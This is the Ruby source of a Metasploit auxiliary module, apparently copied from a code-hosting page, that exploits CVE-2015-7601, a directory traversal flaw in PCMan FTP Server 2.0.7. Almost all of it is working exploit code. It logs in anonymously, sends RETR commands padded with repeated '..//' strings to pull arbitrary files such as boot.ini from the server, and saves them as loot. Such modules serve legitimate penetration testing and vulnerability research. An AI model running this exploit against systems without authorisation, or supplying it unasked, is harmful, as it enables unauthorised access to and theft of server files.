Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',
14
      'Description'    => %q{
15
        This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.
16
        This vulnerability allows an attacker to download arbitrary files from the server by crafting
17
        a RETR command that includes file system traversal strings such as '..//'
18
      },
19
      'Platform'       => 'win',
20
      'Author'         =>
21
        [
22
          'Jay Turla',   # @shipcod3, msf and initial discovery
23
          'James Fitts', # initial discovery
24
          'Brad Wolfe <brad.wolfe[at]gmail.com>'
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'EDB', '38340'],
30
          [ 'CVE', '2015-7601']
31
        ],
32
      'DisclosureDate' => '2015-09-28'
33
    ))
34

35
    register_options(
36
      [
37
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
38
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
39
      ])
40
  end
41

42
  def check_host(ip)
43
    begin
44
      connect
45
      if /220 PCMan's FTP Server 2\.0/i === banner
46
        return Exploit::CheckCode::Appears
47
      end
48
    ensure
49
      disconnect
50
    end
51

52
    Exploit::CheckCode::Safe
53
  end
54

55
  def run_host(target_host)
56
    begin
57
      # Login anonymously and open the socket that we'll use for data retrieval.
58
      connect_login
59
      sock = data_connect
60
      if sock.nil?
61
        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'
62
        print_status(error_msg)
63
        elog(error_msg)
64
      else
65
        file_path = datastore['PATH']
66
        file = ::File.basename(file_path)
67

68
        # make RETR request and store server response message...
69
        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
70
        res = send_cmd( ["RETR", retr_cmd])
71

72
        # read the file data from the socket that we opened
73
        # dont assume theres still a sock to read from. Per #7582
74
        if sock.nil?
75
          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'
76
          print_status(error_msg)
77
          elog(error_msg)
78
          return
79
        else
80
          # read the file data from the socket that we opened
81
          response_data = sock.read(1024)
82
        end
83

84
        unless response_data
85
          print_error("#{file_path} not found")
86
          return
87
        end
88

89
        if response_data.length == 0 or ! (res =~ /^150/ )
90
          print_status("File (#{file_path})from #{peer} is empty...")
91
          return
92
        end
93

94
        # store file data to loot
95
        loot_file = store_loot("pcman.ftp.data", "text", rhost, response_data, file, file_path)
96
        vprint_status("Data returned:\n")
97
        vprint_line(response_data)
98
        print_good("Stored #{file_path} to #{loot_file}")
99
      end
100

101
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
102
      vprint_error(e.message)
103
      elog(e)
104
    rescue ::Timeout::Error, ::Errno::EPIPE => e
105
      vprint_error(e.message)
106
      elog(e)
107
    ensure
108
      data_disconnect
109
      disconnect
110
    end
111
  end
112
end
113

114